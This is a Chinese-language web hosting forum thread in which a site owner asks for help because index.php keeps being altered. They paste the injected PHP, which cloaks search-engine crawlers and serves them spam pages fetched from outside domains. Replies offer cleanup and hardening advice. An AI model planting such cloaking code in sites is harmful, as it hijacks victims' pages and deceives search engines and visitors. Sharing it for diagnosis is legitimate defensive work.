阿里云
阿里云多端小程序中小企业获客首选
发表主题 回复主题
  • 5915阅读
  • 4回复

[网站相关]网站受到攻击,index.php被篡改

级别: 新人
发帖
1
云币
2
近期发现我的网站百度收录出现好多无关广告,进入ftp后发现index.php被篡改,我改回后隔天有被更改,该怎么办


这些广告 标题后面都带“百度 知道”



index.php2次被更改的代码:
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
   $file = file_get_contents('http://www.asttgw.loan/app/');
   echo $file;
}
else
{
include 'index2.php';
   exit();
}
?>


————————————————————————————————


<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'baidu')!==false)
{
   $file = file_get_contents('http://www.hwklq.pw:888/kq/');
   echo $file;//
}
关键词: 网站 攻击 php ftp
级别: 总版主
发帖
7170
云币
15705

只看该作者 沙发  发表于: 2017-04-24
看看有否漏洞?程序有补丁没,如果没补丁建议加固下服务器了
级别: 新人
发帖
1
云币
1
只看该作者 板凳  发表于: 2017-08-23
Re网站受到攻击,index.php被篡改
请问楼主你的问题解决了吗,你用的什么系统,我用的DEDE 的后台,跟你的情况一样,都 有一段时间了,一直解决不了,
级别: 新人
发帖
3
云币
3
只看该作者 地板  发表于: 2018-10-26
Re网站受到攻击,index.php被篡改
网站首页反复被篡改说明你网站程序有漏洞导致被上传了脚本后门木马.
处理方法:先把可疑的文件 查看下修改时间 对比下 自己本地的备份文件 是否有  多余的文件 如果有的话就删除,再看下首页有无被修改 有的话就用备份替换上传  上去,但只能解决一时 还是会被反复篡改,治标不治本,如果对程序代码不熟悉的 话建议找
专业做网站安全公司来处理此问题,国内推荐Sinesafe,绿盟,启明星辰等等
级别: 论坛版主
发帖
1192
云币
1462
只看该作者 4楼 发表于: 2018-10-26
php开源程序,很多目前面临比较严峻的安全问题。
主要原因是你网站有漏洞、或者服务器有漏洞,被人家安装了后门。


处理方法:
1、入口白名单,只允许白名单入口访问, 屏蔽其他入口,防止人家恶意上传php脚本来执行。
2、清理服务器内部挂马代码,清理程序内的挂马的内容。
3、修复程序漏洞、服务器漏洞等。
4、可以通过cdn等方式,隐藏服务器真实ip地址
ECS云服务器零基础教程linux版(高清1080P录制)
注意:本人发布所有言论仅代表个人观点,与阿里云无关,本人亦非阿里云官方工作人员。
发表主题 回复主题
« 返回列表上一主题下一主题

限100 字节
批量上传需要先选择文件,再选择上传
 
验证问题: 85 - 77 = ?
上一个 下一个
      ×
      全新阿里云开发者社区, 去探索开发者的新世界吧!
      一站式的体验,更多的精彩!
      通过下面领域大门,一起探索新的技术世界吧~ (点击图标进入)